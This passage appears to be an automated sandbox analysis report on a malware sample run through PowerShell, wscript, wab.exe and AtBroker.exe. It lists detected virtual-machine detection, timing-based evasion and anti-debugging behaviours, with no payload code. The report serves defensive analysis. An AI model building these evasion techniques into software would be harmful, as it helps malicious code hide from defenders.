        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0456096E rdtsc 11_2_0456096E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B873BFB sldt word ptr [eax]1_2_00007FFD9B873BFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5155Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4723Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7675Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2135Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 2.7 %
        Source: C:\Windows\SysWOW64\AtBroker.exeAPI coverage: 3.1 %
        Source: C:\Windows\System32\wscript.exe TID: 7452Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 7675 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 2135 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6664Thread sleep count: 60 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exe TID: 6664Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_004DD1C0 FindFirstFileW,FindNextFileW,FindClose,11_2_004DD1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicshutdownvmicshutdownUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicshutdown
        Source: wscript.exe, 00000000.00000003.1680103396.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681544989.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: erviceHyper-V PowerS0
        Source: wscript.exe, 00000000.00000003.1679408383.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
        Source: wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicvss
        Source: wscript.exe, 00000000.00000003.1679990684.00000279AEF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680328691.00000279AEF7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682032351.00000279AEF7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679581332.00000279AEF02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
        Source: wscript.exe, 00000000.00000003.1679408383.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\H
        Source: wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
        Source: wscript.exe, 00000000.00000003.1663193733.00000279AF064000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682171522.00000279AF064000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679914474.00000279AF062000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662599926.00000279AF064000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1663566560.00000279AF064000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682355305.00000279AF0BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000000.00000002.1681592885.00000279AD0BC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680078058.00000279AD0BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679408383.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Registry\Machine\Software\Classes\CLSID\{A6FF50C0-56C0-71CA-5732-BED303A59628}Distributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Gues
        Source: wscript.exe, 00000000.00000003.1679408383.00000279AD0B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1002_Classes\Interface\{89bc3f49-f8d9-5103-ba13-de497e609167}\ProxyStubClsid32 Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWind
        Source: wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicheartbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicheartbeat
        Source: wscript.exe, 00000000.00000003.1679990684.00000279AEF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680328691.00000279AEF7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682032351.00000279AEF7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679581332.00000279AEF02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
        Source: wscript.exe, 00000000.00000003.1679990684.00000279AEF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680328691.00000279AEF7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1682032351.00000279AEF7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679581332.00000279AEF02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
        Source: wscript.exe, 00000000.00000002.1682548937.00000279AF1C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wscript.exe, 00000000.00000003.1679728503.00000279AEF0B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
        Source: wscript.exe, 00000000.00000003.1680168522.00000279AEEC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup Engine ServiceWindows Biometric ServiceWindows Connection ManagerWindoR
        Source: powershell.exe, 00000001.00000002.2248036223.0000024AECC39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 11_2_0456096E rdtsc 11_2_0456096E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04E2D6F8 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,4_2_04E2D6F8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A772A0 mov eax, dword ptr fs:[00000030h]9_2_22A772A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A772A0 mov eax, dword ptr fs:[00000030h]9_2_22A772A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A762A0 mov eax, dword ptr fs:[00000030h]9_2_22A762A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A762A0 mov ecx, dword ptr fs:[00000030h]9_2_22A762A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A762A0 mov eax, dword ptr fs:[00000030h]9_2_22A762A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A762A0 mov eax, dword ptr fs:[00000030h]9_2_22A762A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A762A0 mov eax, dword ptr fs:[00000030h]9_2_22A762A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A762A0 mov eax, dword ptr fs:[00000030h]9_2_22A762A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA92A6 mov eax, dword ptr fs:[00000030h]9_2_22AA92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA92A6 mov eax, dword ptr fs:[00000030h]9_2_22AA92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA92A6 mov eax, dword ptr fs:[00000030h]9_2_22AA92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AA92A6 mov eax, dword ptr fs:[00000030h]9_2_22AA92A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A692BC mov eax, dword ptr fs:[00000030h]9_2_22A692BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A692BC mov eax, dword ptr fs:[00000030h]9_2_22A692BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A692BC mov ecx, dword ptr fs:[00000030h]9_2_22A692BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A692BC mov ecx, dword ptr fs:[00000030h]9_2_22A692BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A60283 mov eax, dword ptr fs:[00000030h]9_2_22A60283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A60283 mov eax, dword ptr fs:[00000030h]9_2_22A60283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22A60283 mov eax, dword ptr fs:[00000030h]9_2_22A60283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_22AB5283 mov eax, dword ptr fs:[00000030h]9_2_22AB5283
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F02A0 mov eax, dword ptr fs:[00000030h]9_2_229F02A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_229F02A0 mov eax, dword ptr fs:[00000030h]9_2_229F02A0
